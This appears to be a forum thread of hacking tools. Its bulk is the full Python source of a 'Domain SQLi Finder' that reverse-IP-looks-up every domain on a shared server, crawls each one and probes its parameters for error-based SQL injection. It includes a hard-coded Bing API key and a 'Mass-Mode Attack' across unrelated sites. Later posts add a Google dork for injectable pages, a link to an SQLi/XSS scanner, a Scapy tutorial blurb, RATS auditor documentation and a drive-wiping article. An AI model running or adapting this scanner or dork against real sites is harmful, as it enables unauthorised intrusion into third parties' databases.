Mass-Mode Attack - targeting a whole domain:
# ./Domain-SQLi-finder.py --verbose 1 --durl demo.testfire.net --crawl 50 --pages 5 --sites 4 --vulsites 2 --output testfire-SQLi.txt

It starts with a reverse IP lookup, if requested, and finds all domains hosted on the shared hosting server. (In the example run, three domains were found hosted on a single server.) The script then targets each domain one by one, crawling and testing SQLi against each.

Usage:
--verbose : Value 0 displays only the minimum messages required. Value 1 displays complete progress. By default, verbosity is off.
--output : Output file name to hold the final result. If not specified, a default file named DSQLiResults.txt will be created in the same directory.

Single-Mode Attack:
--url : takes the target URL as input
--crawl : number of pages on the website to crawl (default is 500). The Chilkat library is used for crawling.
--pages : number of vulnerable pages (injectable parameters) to find on the site (default is 0, i.e. try to find all possible vulnerable pages)

Mass-Mode Attack:
--durl : URL of the domain
--sites : number of sites to scan on the domain. Default is 0, i.e. scan all.
--vulsites : number of vulnerable sites to find before scanning stops automatically. Default is 0, i.e. try to find all vulnerable sites.
--dcrawl : number of pages to crawl on each website (default is 500)
--dpages : number of vulnerable pages to find on each site. Default is 0, i.e. try to find all possible vulnerable pages.
--reverse : this option has a dual role:
- If specified on the command line with an output file name, the script assumes the user has already done the reverse-IP lookup, i.e. a file exists in the same directory holding the reverse-IP lookup result, and the script just needs to read it. This has another benefit: the script doesn't have to do the reverse-IP lookup every time it is fired. Generate the file once; if you quit the script partway through a domain, the next time you only need to supply an amended reverse-IP lookup file, i.e. with the already-scanned target URLs removed from the list.
- If this option is not specified on the command line, the script performs the reverse-IP lookup itself.

The script generates a few more files during scanning which can be considered log files, e.g. the crawler output file, the unique-links-parsed output file, and the reverse-IP lookup output file.

Domain-SQLi-finder.py

#!/usr/local/bin/python2.7
# This was written for a Penetration Test assessment and is for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing only! import chilkat, sys, os, argparse, httplib, urlparse, urllib2, re, time, datetime import DomainReverseIPLookUp # The following three variables get their values from command line args, either take user value or stick with the default ones pagesToCrawl = "" # Number of pages to crawl in a website maxVulInjectableParam = "" # Maximum number of vulnerable pages (parameters) to find output = "" # Output file name - append mode (a) reverseLookUp = "DSQLiReverseLookUp.txt" # Output file name for reverseIP lookup - write+ mode (w+) crawlDump = 'DSQLiCrawlerOutput.txt' # Stores crawling result for current crawl only - write+ mode (w+) uniqueLinksDump = 'DSQLiUniqueLinks.txt' # Stores crawling result for current scan only - write+ mode (w+) errorDump = 'DSQLiErrorDump.txt' # Dumps handled errors - append mode (a) sitesToScan = "" # Stores maximum number of sites to scan on domain in case of Mass-Mode Attack maxVulSites = "" # Stores maximum number of vulnerable sites to find with Mass-Mode Attack reverseFlag = 0 # Determines whether reverseLookUp file is generated by script or user supplies it maxVulSitesFlag = 0 # Keeps track of how many vulnerable sites have been found in Mass-Mode Attack verbose = 0 # Determines what messages to display on screen (0 or 1) sqlPayload = ["1'"] # SQL Payloads, add in more here sqlErrors = [ "Warning", "mysql_fetch_array()", "mysql_fetch_object()", "mysql_num_rows()", "mysql_free_result()", "mysql_real_escape_string()", "mysql_connect()", "mysql_select_db()", "mysql_query()", "You have an error in your SQL syntax", "Unclosed quotation mark after the character string", "Server Error in '/' Application", "Microsoft OLE DB Provider for ODBC Drivers error", "supplied argument is not a valid OCI8-Statement", "microsoft jet database engine" ] # add in more here # Determine platform and clear screen def clear_screen(): if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': os.system('clear') elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos': os.system('cls') else: pass # Banner - Set the formatting mororn, it's fucked up atm def banner(): print """ ################################################################## Domain SQLi Finder - (Error Based Tool-v0.1) b0nd@garage4hackers.com Greetz to: (www.garage4hackers.com) GGGGGG\ GG __GG\ GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\ GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\ GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee | GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____| \GGGGGG |\\aaaaaaa |rr | \\aaaaaaa |\ggggggg |\\eeeeeee\ \______/ \_______|\__| \_______| \____gg | \_______| gg\ gg | gggggg | \______/ ################################################################### """ print "\tUsage: python %s [options]" % sys.argv[0] print "\t\t-h help\n" call_exit() def call_exit(): print "\n\tExiting ...........\n" sys.exit(0) # Tests SQLi on all unique links and parameters by appending sqlPayload and checking the source def check_SQLi(uniqueUrls): sqliUrls = [] # This list will contain sorted URLs ready to be appended with sqlPayloads flag = 0 # Variable to check whether desired 'n' number of vulnerable pages have been found for link in uniqueUrls: # This list has all unique URLs but since a single unique URL might have multiple parameters num = link.count("=") # so this loop prepares URLs with one parameter each if num > 0: for x 
in xrange(num): x = x + 1 url = link.rsplit("=",x)[0]+"=" sqliUrls.append(url) sqliUrls = list(set(sqliUrls)) # By now this list has all injectable parameters ready to append sqlPayload parsed = urlparse.urlparse(link) # Later used to obtain website name now = datetime.datetime.now() # Current time of scanning to put in DSQLiResults output file try: fd_output = open(output, 'a') fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file except IOError: print "\n\t[!] Error - could not open|write file %s \n" % output if verbose == 1: print "\n[*] Testing SQLi on following URLs:" for link in sqliUrls: print "\t[-] URL: ", link else: print "\n[*] Testing SQLi on URL's ....." # In the following loop, the counter flag plays role to find 'n' number of vulnerable pages. If limited number of pages # have to be found, the value of flag counter determines whether script has found those number of pages or not. Once matches, # it breaks all loops and come out. Else, if it has not touched the limit but links in sqliUrls have finished, control comes # out of all loops. But if (0) i.e. all pages have to be found, flag plays no considerable role other than incrementing itself. for link in sqliUrls: for pload in sqlPayload: if verbose == 1: print "\n\n\tTesting: %s\n" % (link+pload) try: source = urllib2.urlopen(link+pload).read() # Appending sqlPayload and reading source for errors except urllib2.HTTPError, err: if err.code == 500: if verbose == 1: print "\t\t[!] Error - HTTP Error 500: Internal Server Error" print "\t\t[-] Continuing with next link" continue else: if verbose == 1: print "\t\t[!] Error - HTTP Error xxx" print "\t\t[-] Continuing with next link" continue for errors in sqlErrors: if re.search(errors, source) != None: # If any sql error found in source fd_output.write("\t\t[!] BINGO!!! SQLi Vulnerable " + link+pload + "\n") print "\n\t\t[!] BINGO!!! - SQLi FOUND in: %s (%s) \n" % (link+pload, errors) if maxVulInjectableParam != 0: # i.e. if 'n' number of vulnerable parameters have to be found if flag < maxVulInjectableParam: flag = flag + 1 else: break else: # i.e if all vulnerable pages have to be found flag = flag + 1 break else: if verbose == 1: print "\t\t[-] Not Vulnerable - String (%s) not found in response" % errors else: pass if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found break if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found break if flag != 0: print "\n\t[-] Target is vulnerable to SQLi, check log file" print "\t\t[-] %d injectable vulnerable parameters found" % (flag) global maxVulSitesFlag maxVulSitesFlag = maxVulSitesFlag + 1 # Increment the flag which determines how many vulnerable sites to find in case of Mass-Mode Attack else: print "\n\t[-] Target is not vulnerable to SQLi" try: fd_output.write("\t\tTarget is not vulnerable to SQLi attack\n") fd_output.close() # Close the file on completion of each URL, so that log file could be seen for except IOError: # result instantly, instead of waiting for whole script to finish print "\n\t[!] 
Error - file I/O error\n" try: fd_output.close() except IOError: pass # Just finds the unique URLs from all crawled URLs and saves to list # Concept is: Parse the URL, find its injectable parameter(s), check the combination of [netlock, path and injectable parameters] with earlier found # combinations, if unique, update our uniqueUrls list else goto next URL and parse it for same procedure def unique_urls(unsortedUrls): print "\n[*] Finding unique URL's ....." list_db = [] # Used as temporary storage to compare parameters with already found ones uniqueUrls = [] # This one will finally have unique URLs in it for link in unsortedUrls: list_tmp = [] # Temporary list to store query parameters only try: parsed = urlparse.urlparse(link) num = parsed.query.count("=") # Just checking the parsed.query portion for number of injectable parameters it has x = 0 for x in xrange(num): list_tmp.append(parsed.query.split("&")[x].rsplit("=",1)[0]) # list_tmp would have all injectable parameters in it as elements x = x + 1 except IndexError: # In my case links generate error bcoz they include an external URl and increase the number of "=" in link. # accordingly the loop run 1 extra time and generates out of index error if verbose == 1: print "\n\t[!] Error - List Index Out of Order - check %s and report to author" % (errorDump) try: fd_errorDump = open(errorDump, 'a') fd_errorDump.write("\n\t[*] Error occured inside unique_urls function for:\t" + parsed.query) except IOError: print "\n\t[!] Error - could not open|write file %s \n" % errorDump continue list_tmp = [parsed.netloc, parsed.path, list_tmp] if list_tmp in list_db: # For the first URL, this condition would definitely fail as list_db is empty continue # i.e. same parameters but with different values have been found, so continue else: list_db.append(list_tmp) # Update the found unique parameters uniqueUrls.append(link) # Update the List with unique complete URLs if verbose == 1: for link in uniqueUrls: print "\t[-] Unique link found: ", link try: fd_uniqueLinkDump = open(uniqueLinksDump, 'a') for link in uniqueUrls: fd_uniqueLinkDump.write(link + '\n') fd_uniqueLinkDump.close() except IOError: print "\n\t[!] Error - could not open|write file %s \n" % uniqueLinksDump check_SQLi(uniqueUrls) # Call SQLi check function to test SQLi vulnerability # Function crawls to find "linksToCrawl" number of pages from URL. # It stops when limit reaches or no more pages left to crawl, which ever meets the condition first def crawl_site(url): print "[*] Attacking URL -> ", url print "\t[*] Crawling %s to find injectable parameters" % url spider = chilkat.CkSpider() # Using Chilkat Library. Some modules are free. 
spider.Initialize(url) spider.AddUnspidered(url) spider.CrawlNext() print "\n\t[-] Website Title: ", spider.lastHtmlTitle() print "\n\t[-] Crawling Pages", # The trailing comma to show progress bar in case of non-verbose crawlerOutput = [] # This list would have all the linksToCrawl number of pages of URL for i in range(0,int(pagesToCrawl)): success = spider.CrawlNext() if (success == True): if verbose == 1: if i%50 == 0: print "\n[-] %d percent of %d pages to crawl complete\n" % ((i*100)/pagesToCrawl, pagesToCrawl) print "\t", spider.lastUrl() else: sys.stdout.flush() print ".", # In non verbose case, it prints dot dot dot to show the progress crawlerOutput.append(spider.lastUrl()) else: if (spider.get_NumUnspidered() == 0): print "\n\t[-] No more URLs to spider" i = i - 1 # Need to decrement, else gives +1 count for total pages crawled break else: print spider.lastErrorText() continue spider.SleepMs(10) try: fd_crawlDump = open(crawlDump, 'a') # Logs for link in crawlerOutput: fd_crawlDump.write(link + '\n') fd_crawlDump.close() except IOError: print "\n\t[!] Error - could not open|write file %s \n" % crawlDump print "\n\t[-] Crawled %d pages successfully" % (i+1) if verbose == 1: print "\n[*] Parsing URL's to collect links with '=' in them ....." urlsWithParameters = [] # This list would have only those URLs which has '=' in them i.e. injectable parameter(s) for link in crawlerOutput: if link.count("=") > 0: urlsWithParameters.append(link) if urlsWithParameters != []: if verbose == 1: print "\t[-] Done" unique_urls(urlsWithParameters) # Time to find unique URLs among all with '=' in them else: print "\n\t[!] No injectable parameter found" now = datetime.datetime.now() # Current time to put in DSQLiResults output file try: parsed = urlparse.urlparse(url) fd_output = open(output, 'a') fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file fd_output.write("\t\tNo injectable parameter found\n") fd_output.close() except IOError: print "\n\t[!] Error - could not open|write file %s \n" % output # Function tries to find SQLi on sites on shared hosting def attack_Domain(durl): sites = [] counter = 0 # This keeps check on how many sites have been scanned so far deadLinks = 0 # This keeps check on how many dead links have been found print "\n[*] Attacking Domain -> ", durl if reverseFlag == 0: # i.e. if --reverse switch is not used on console. That means, do reverseIP Lookup and generate result DomainReverseIPLookUp.generate_reverse_lookup(durl, reverseLookUp, verbose) # pass domain url, output file name and verbose level try: fd_reverseLookUp = open(reverseLookUp, 'r') for url in fd_reverseLookUp.readlines(): sites.append(url) # List sites contains all the domains hosted on server except IOError: print "\n\t[!] Error - %s file missing" % reverseLookUp print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website" call_exit() elif reverseFlag == 1: # i.e. if --reverse switch is mentioned, then don't do reverse IP Lookup and read data from already generated file try: fd_reverseLookUp = open(reverseLookUp, 'r') for url in fd_reverseLookUp.readlines(): sites.append(url) # List sites contains all the domains hosted on server except IOError: print "\n\t[!] 
Error - %s file missing" % reverseLookUp print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website" call_exit() if len(sites)%10 != 0: sites = sites[0:(len(sites)%10)] else: sites = sites[0:((len(sites)+2)%10)] for site in sites: try: print "\n\t#################################################" print "\n\t [-] Number of alive sites scanned so far: ", counter print "\n\t [-] Number of vulnerable sites found so far: ", maxVulSitesFlag print "\n\t [-] Number of dead sites found so far: ", deadLinks print "\n\t#################################################\n" if maxVulSites != 0: # i.e. if not all vulnerable sites are to be found if maxVulSitesFlag == maxVulSites: print "\n\t[-] Stopping scan - the required number of vulnerable sites have been found" break if site[:7] != "http://": # prepend http:// to url, if not already done by user site = "http://" + site # what about https site? site = site[:-1] # remove \n at the end of each element print "-"*80 print "\n[*] Target URL - %s ....." % (site) # Verify URL for its existance if verify_URL(site) == True: # Function call to verify URL for existance print "\t[-] URL Verified\n" crawl_site(site) # Pass the site to crawl function else: print "\n\t[-] URL %s could not be verified, continuing with next target in list" % site deadLinks = deadLinks + 1 continue except KeyboardInterrupt: decision = raw_input("\n\t[?] how do you want to proceed? [(C)ontinue with next target in list or (q)uit]: ") if decision == 'C' or decision == 'c': continue elif decision == 'q': print "\n[!] Error - user aborted" call_exit() else: print "\n\tEnjoy: oo=========> (|)" call_exit() counter = counter + 1 # Counting for only those sites which really got scanned # for those whose URLs couldn't be verified, not incrementing counter print "\n\n[*] Scanning Finished" print "\n\t[-] Total Number of vulnerable sites found in domain: ", maxVulSitesFlag print "\t[-] Check log file %s for result" % output # Function to verify URL is alive and accessible def verify_URL(url): good_codes = [httplib.OK, httplib.FOUND, httplib.MOVED_PERMANENTLY] # 200, 302, 301 respectively host, path = urlparse.urlparse(url)[1:3] # elems [1] and [2] - netloc and path try: conn = httplib.HTTPConnection(host) conn.request('HEAD', path) status = conn.getresponse().status conn.close() except StandardError: status = None return status in good_codes # Either 'True' or 'False' # Parse command line arguments, allowed combinations and mandatory values def parseArgs(): parser = argparse.ArgumentParser(description = 'Domain SQLi Finder - Error Based Tool v0.1', epilog="Report bugs to b0nd@garage4hackers.com | www.garage4hackers.com") parser.add_argument('--verbose', nargs='?', dest='verbose', default=0, help='set verbosity [0 (default) : Off | 1 : On]', type=int) parser.add_argument('--output', metavar='output.txt', dest='siteOutput', default='DSQLiResults.txt', help='output file to store results in (default=DSQLiResults.txt)') group1 = parser.add_argument_group('Single-Mode Attack: Target One Site on Domain') group1.add_argument('--url', nargs=1, dest='URL', help='target site to find SQLi') group1.add_argument('--crawl', nargs='?', dest='crawl', default=500, help='number of pages to crawl (default=500)', type=int) group1.add_argument('--pages', nargs='?', dest='pages', default=0, help='number of vulnerable pages (injectable parameters) to find in site (default=0 i.e. all)', type=int) # Mind it - In group1 and group2, same paramters "crawl" and "pages" are used. 
    # So on console, whether the user passes --crawl or --dcrawl, they would update the same
    # variable "crawl" and ultimately the global variable pagesToCrawl. The same goes for "pages".
    group2 = parser.add_argument_group('Mass-Mode Attack: Target All Sites on Domain')
    group2.add_argument('--durl', nargs=1, dest='DURL', help='target domain to find SQLi')
    group2.add_argument('--sites', nargs='?', dest='sites', default=0, type=int, help='number of sites to scan on domain (default=0 i.e. all)')
    group2.add_argument('--vulsites', nargs='?', dest='vulsites', default=0, type=int, help='number of vulnerable sites to find on domain (default=0 i.e. all possible)')
    group2.add_argument('--dcrawl', nargs='?', dest='crawl', default=500, type=int, help='number of pages to crawl in each site (default=500)')
    group2.add_argument('--dpages', nargs='?', dest='pages', default=0, type=int, help='number of vulnerable pages (injectable parameters) to find in each site (default=0 i.e. all)')
    group2.add_argument('--reverse', metavar='output.txt', nargs=1, dest='reverseLookUp', help='output file to store found sites on server and|or read Reverse IP Lookup results from file')

    args = parser.parse_args()

    # Check exclusiveness of options
    if (args.URL != None and args.DURL != None):
        print "\n\t[!] Error - Mutually exclusive options (--url, --durl)"
        call_exit()

    # Check existence of at least one option
    if (args.URL == None and args.DURL == None):
        print "\n\t[!] Error - No mode selected (--url, --durl)"
        call_exit()

    # Check that a value is passed to each argument: e.g. --crawl without a value would pass "None" and crash the program.
    # All of these switches have default values, so the user either omits them or must supply a value.
    if (args.crawl == None or args.pages == None or args.sites == None or args.vulsites == None):
        print "\n\t[!] Error - Insufficient number of value(s) passed to argument(s)"
        call_exit()

    # Make sure the numeric value of vulsites is less than sites, and pages < crawl
    if args.sites < args.vulsites:
        print "\n\t[!] Error - kidding? --sites shall be > --vulsites\n"
        call_exit()
    elif args.crawl < args.pages:
        print "\n\t[!] Error - kidding? --(d)crawl shall be > --(d)pages\n"
        call_exit()

    # Check that the --reverse switch is used with --durl only
    if ((args.URL != None) and (args.reverseLookUp != None)):
        print "\n\t[!] Error - '--reverse' switch goes with Mass-Mode (--durl) attack only"
        call_exit()

    global reverseLookUp    # Declared here as it is used a couple of times in this function

    # Check verbosity (--verbose argument)
    if args.verbose != None:        # It would be None only when mentioned without any value, i.e. --verbose <no value>
        if args.verbose == 1:       # If that is the case, the global value of verbose is 0 already, so verbose stays off
            print "\n[*] Verbose Mode On"
            global verbose          # verbose global variable
            verbose = 1

            if args.URL != None:    # Verbose mode for --url
                print "\t[-] Pages to crawl (default=500): ", (args.crawl)
                print "\t[-] Vulnerable injectable parameters (pages) to find in site (default=0 i.e. all): %d" % (args.pages)
                print "\t[-] Output file name: %s" % (args.siteOutput)

            if args.DURL != None:   # Verbose mode for --durl
                print "\t[-] Number of sites to scan on domain (default=0 i.e. all): ", (args.sites)
                print "\t[-] Number of vulnerable sites to find on domain (default=0 i.e. all possible): ", (args.vulsites)
                print "\t[-] Pages to crawl in each site (default=500): ", (args.crawl)
                print "\t[-] Vulnerable injectable parameters (pages) to find in each site (default=0 i.e. all): %d" % (args.pages)
                if args.reverseLookUp != None:  # i.e. the reverse look-up file name is mentioned on the console
                    print "\t[-] Reverse IP Look-up file needed to read domains from: %s" % (args.reverseLookUp[0])
                else:
                    print "\t[-] Reverse IP Look-up output file: %s" % reverseLookUp
                print "\t[-] Final result output file: %s" % (args.siteOutput)
        else:       # i.e. value 0 is passed to --verbose
            print "\n[*] Verbose Mode Off"
    else:           # i.e. verbose has the value None; it was passed without a value
        print "\n[*] Verbose Mode Off (by default)"

    # By this point, either the --url or the --durl switch is enabled.
    # The following assignments serve both --url and --durl; only the relevant ones could be kept here
    # and the rest moved into "if args.DURL != None". The current "common" crawl and pages parameters
    # are fine as they are; assigning parameters separately for --url and --durl would first require
    # defining "dcrawl" and "dpages" and using them in combination with --durl.
    global pagesToCrawl
    pagesToCrawl = args.crawl
    global maxVulInjectableParam
    maxVulInjectableParam = args.pages
    global output
    output = args.siteOutput
    global sitesToScan
    sitesToScan = args.sites
    global maxVulSites
    maxVulSites = args.vulsites

    # Single-Mode Attack (--url argument)
    if args.URL != None:
        if args.URL[0][:7] != "http://":            # prepend http:// to the URL if the user has not (what about https sites?)
            args.URL[0] = "http://" + args.URL[0]

        print "\n[*] Verifying URL....."
        if verify_URL(args.URL[0]) == True:         # Function call to verify that the URL exists
            print "\t[-] URL Verified\n"
            crawl_site(args.URL[0])                 # Go to the function which deals with a single URL
        else:
            print "\n\t[-] URL could not be verified."
            call_exit()

    # Mass-Mode Attack (--durl argument)
    elif args.DURL != None:
        if args.DURL[0][:7] != "http://":
            args.DURL[0] = "http://" + args.DURL[0]

        # reverseLookUp has no default value, so if not mentioned on the console it will be None. If not None,
        # the user wants to read an already generated reverse look-up file, produced either by this code or
        # copied from elsewhere. In that case the input file must reside in the same directory.
        if args.reverseLookUp != None:
            reverseLookUp = args.reverseLookUp[0]
            global reverseFlag      # Determines whether the reverseLookUp file is generated by the script or supplied by the user
            reverseFlag = 1
            attack_Domain(args.DURL[0])
        else:       # i.e. --reverse is not mentioned on the command prompt; our code shall generate one.
            print "\n[*] Verifying Domain - %s ....." % (args.DURL[0])
            if verify_URL(args.DURL[0]) == True:
                print "\t[-] Domain Verified\n"
                attack_Domain(args.DURL[0])
            else:
                print "\n\t[-] Domain could not be verified."
                call_exit()

def main():
    #clear_screen()
    if len(sys.argv) < 2:
        banner()
    parseArgs()     # Parse command line arguments
    call_exit()

# ---------------------------------------- Code execution starts here -------------------------------------
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print "\n[!] Error - user aborted"
        call_exit()

DomainReverseIPLookUp.py

#!/usr/local/bin/python2.7
# The objective of this script is to generate an output file with all the URLs found on the shared
# hosting ('DSQLiReverseLookUp.txt' by default).
# Shamelessly copied from http://hack-addict.blogspot.co.nz/2011/09/finding-domains-on-targeted-host.html.
# Thanks and credit to the author.

import httplib, urllib, socket, sys
from xml.dom.minidom import parse, parseString

#reverseLookUp = 'DSQLiReverseLookUp.txt'

def generate_reverse_lookup(domainURL, filename, verbose):
    print "\t[*] Performing Reverse IP Lookup to collect all domains hosted on same server....."
    if domainURL[:7] == "http://":
        domainURL = domainURL[7:]
    # print "\n inside generate_reverse_lookup function with args: ", domainURL

    AppId = '1734E2C92CA63FAA596335295B09CF1D0B5C6161'
    sites = [domainURL]
    ip = socket.gethostbyname(domainURL)
    offset = 50

    # Page through the Bing API results, 50 entries at a time
    while offset < 300:
        uri = "/xml.aspx?AppId=%s&Query=ip:%s&Sources=Web&Version=2.0&Market=en-us&Adult=Moderate&Options=EnableHighlighting&Web.Count=50&Web.Offset=%s&Web.Options=DisableQueryAlterations" % (AppId, ip, offset)
        conn = httplib.HTTPConnection("api.bing.net")
        conn.request("GET", uri)
        res = conn.getresponse()
        data = res.read()
        conn.close()
        xmldoc = parseString(data)
        nameEls = xmldoc.getElementsByTagName('web:DisplayUrl')
        for el in nameEls:
            temp = el.childNodes[0].nodeValue
            temp = temp.split("/")[0]
            if temp.find('www.') == -1:
                if temp not in sites:
                    sites.append(temp)
        offset += 50

    print "\n\t[-] Reverse IP Look Up successful"
    # print "\n\t[-] Number of domain(s) found: %d\n" % len(sites)

    try:
        fd_reverseLookUp = open(filename, 'w+')
        for site in sites:
            fd_reverseLookUp.write(site + '\n')
            if verbose == 1:
                print "\t\t", site
        print "\n\t[-] Number of domain(s) found: %d\n" % len(sites)
        fd_reverseLookUp.close()
    except IOError:
        print "\n\t[!] Error - could not open|write %s file" % filename
        sys.exit(1)

Download mirror:
Domain-SQLi-finder.py.txt
DomainReverseIPLookUp.py.txt

chilkat library: Chilkat Python Module

Source: Domain SQL Injector - Find SQL Injection on all sites hosted on server
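The note at the top about --crawl and --dcrawl updating the same variable works because argparse happily lets two different switches write to the same dest, which is how the Single-Mode and Mass-Mode groups end up sharing one set of globals. A minimal standalone sketch of that mechanism (illustrative only, not part of the scanner):

import argparse

parser = argparse.ArgumentParser()
g1 = parser.add_argument_group('Single-Mode')
g1.add_argument('--crawl', nargs='?', dest='crawl', default=500, type=int)
g2 = parser.add_argument_group('Mass-Mode')
g2.add_argument('--dcrawl', nargs='?', dest='crawl', default=500, type=int)

args = parser.parse_args(['--dcrawl', '250'])
print args.crawl    # -> 250; "--crawl 250" would set the very same attribute
# Note: with nargs='?', passing the switch with no value yields None,
# which is exactly what the scanner's "Insufficient number of value(s)" check catches.

An illustrative Mass-Mode invocation of the scanner itself, using the switches defined above (example.com stands in for a real target):

python Domain-SQLi-finder.py --durl example.com --sites 10 --vulsites 2 --dcrawl 200 --verbose 1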
  17. Part 1: Code your own Server/Client and start analyzing with Scapy

Part 1 (INTRO): In the Python part of the video, we jump right into the code, cover your first Python TCP client and server, and walk you through each of them, line by line. The Scapy part of the video shows basic packet analysis in Scapy, with a few helpful "making yourself feel at home in Scapy" tips. You will also walk out of this part with a better understanding of SYN/ACK/FIN packets, and of what TCP connections and disconnects look like "on the wire". We also have a little surprise at the end.

The source files (Python 2.6) can be downloaded at: github.com/piman/PyPrimer-for-Hackers

------------

Some key points we want to cover in the whole video series:
- toolz often lie! code your own networking tools and get the correct feedback!
- code your own networking environments
- some network attacks
- run your toolz on several machines and communicate with them
- ...and other funny stuff

Part 2 src: python tutorial for hackers pentesters | th3mast3r
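For the impatient, here is a minimal sketch of the kind of TCP client/server pair the video builds - plain Python 2 standard library, not the tutorial's actual source (that lives in the GitHub repo above):

# server.py - accept one connection, send back a reply (Python 2)
import socket

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', 9999))      # 9999 is an arbitrary example port
server.listen(1)
print "[*] Listening on 0.0.0.0:9999"
client, addr = server.accept()      # accept() completes the SYN / SYN-ACK / ACK handshake
print "[*] Connection from %s:%d" % addr
data = client.recv(1024)
print "[*] Received:", data
client.send("ACK: " + data)
client.close()                      # close() triggers the FIN/ACK teardown you can watch in Scapy
server.close()

# client.py - connect, send one message, print the reply
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 9999))
sock.send("hello")
print "[*] Server replied:", sock.recv(1024)
sock.close()

Run the server in one terminal and the client in another, with Scapy sniffing in a third (e.g. sniff(filter="tcp port 9999", prn=lambda p: p.summary())), and the handshake and teardown described above show up packet by packet.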
  18. dork: inurl:.php?id= site:sitexxxxxxxx.com or "Import sites"
  19. Download: Downloads - maxisploit-scanner - Scanner for SQL injection (error/blind) and XSS.

Analysis Report for MaXIsploit.exe:
https://www.virustotal.com/file/f740429ae15d1ed571f4c23a7442c7f0e3f88678834c33a24dbd5d2bc91fbfa5/analysis/1335614595/

source: Maxisploit Scanner Demo
  20. Welcome to RATS - Rough Auditing Tool for Security

RATS - Rough Auditing Tool for Security - is an open source tool developed and maintained by Secure Software security engineers. Secure Software was acquired by Fortify Software, Inc.

RATS is a tool for scanning C, C++, Perl, PHP and Python source code and flagging common security-related programming errors such as buffer overflows and TOCTOU (Time Of Check, Time Of Use) race conditions. RATS provides a security analyst with a list of potential trouble spots on which to focus, describes each problem, and potentially suggests remedies. It also provides a relative assessment of the potential severity of each problem, to help an auditor prioritize. The tool also performs some basic analysis to try to rule out conditions that are obviously not problems.

As its name implies, the tool performs only a rough analysis of source code. It will not find every error, and it will also flag things that are not errors. Manual inspection of your code is still necessary, but it is greatly aided by this tool.

Download RATS

RATS is free software. You may copy, distribute, and modify it under the terms of the GNU Public License.

Latest Release: 2.3
Source tarball: rats-2.3.tar.gz [382K] [MD5]
Win32 binary: rats-2.3-win32.zip [220K] [MD5]

Requirements

RATS requires expat to be installed in order to build and run. Expat is often installed in /usr/local/lib and /usr/local/include. On some systems, you will need to specify the --with-expat-lib and --with-expat-include options to configure so that it can find your installation of the library and header. Expat can be found at: The Expat XML Parser

Installation

Building and installation of RATS is simple. To build, you simply need to run the configuration shell script in the distribution's top-level directory:

./configure

The configuration script is a standard autoconf-generated configuration script and accepts many options. Run configure with the --help option to see what options are available. Once the configuration script has completed successfully, simply run make in the distribution's top-level directory to build the program:

make

By default, RATS will be installed to /usr/local/bin and its vulnerability database will be installed to /usr/local/lib. You may change the installation directories of both with the --prefix option to configure. You may optionally use --bindir and --datadir to specify more precise locations for the files that are installed. To install after building, simply run make with the install target:

make install

This will copy the built binary, rats, to the binary installation directory and the vulnerability database, rats.xml, to the data installation directory.

Running RATS

Once you have built and installed RATS, it's time to start auditing your software! RATS accepts a few command line options, described below, and a list of files to audit on the command line. If no files to audit are specified, stdin will be used.

Usage: rats [-d <database>] [-h] [-i] [-l <language>] [-r] [-w <level>] [-x] [file1 file2 ... filen]

Options explained:

-d <database>  Specifies a vulnerability database to be loaded. You may have multiple -d options, and each database specified will be loaded.
-h             Displays a brief usage summary.
-i             Causes a list of function calls that were used which accept external input to be produced at the end of the vulnerability report.
-l <language>  Forces the specified language to be used regardless of filename extension. Currently valid language names are "c", "perl", "php" and "python".
-r             Causes references to vulnerable function calls that are not being used as calls themselves to be reported.
-w <level>     Sets the warning level. Valid levels are 1, 2 or 3. Level 1 includes only default and high severity vulnerabilities; level 2 adds medium severity and is the default; level 3 adds low severity vulnerabilities.
-x             Causes the default vulnerability databases (which are in the installation data directory, /usr/local/lib by default) not to be loaded.

When started, RATS will scan each file specified on the command line and produce a report when scanning is complete. Which vulnerabilities appear in the final report depends on the data contained in the vulnerability database(s) used and the warning level in effect. For each vulnerability, the list of files and line numbers where it occurred is given, followed by a brief description of the vulnerability and a suggested action.

https://www.fortify.com/ssa-elements/threat-intelligence/rats.html
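As a quick illustration of the options above (the file name is hypothetical), a maximum-verbosity scan of a C source file, forced to the C parser, looks like:

rats -w 3 -l c vulnerable.c

This loads the default database from /usr/local/lib, reports default, high, medium and low severity findings, and prints the file name and line numbers for each hit.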
  21. Most people know that simply deleting a file won't stop someone from recovering important data from your hard drive. Sure, you could do a 35-pass Gutmann wipe or run a program such as Darik's Boot and Nuke, but if you really want to feel secure, you need to bring in the heavy artillery. Maker Wiebetech claims that its Drive eRazer Ultra will make your data disappear in a fashion that's good enough even for the Department of Defense (whatever that means), or you can use any of ten other modes if you think the DoD specs aren't good enough. Unlike the software-based solutions mentioned earlier, the Drive eRazer Ultra is a physical box that you connect directly to your SATA or IDE drive. Wiping runs at around seven gigabytes per minute, so it should make pretty quick work of your drive. Best of all, after it is completely erased, the drive can be reused just as if it were new. The cost of all this security? Just $274, or a lot more than the hard drive probably cost new. What the heck were you hiding on there anyway?

Wiebetech, via dvice
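To put that throughput in perspective, a back-of-the-envelope calculation (the 1 TB drive size is illustrative, not from the article):

# Wipe time at the quoted ~7 GB/min (Python 2)
drive_gb = 1000                  # hypothetical 1 TB drive
rate_gb_per_min = 7.0
minutes = drive_gb / rate_gb_per_min
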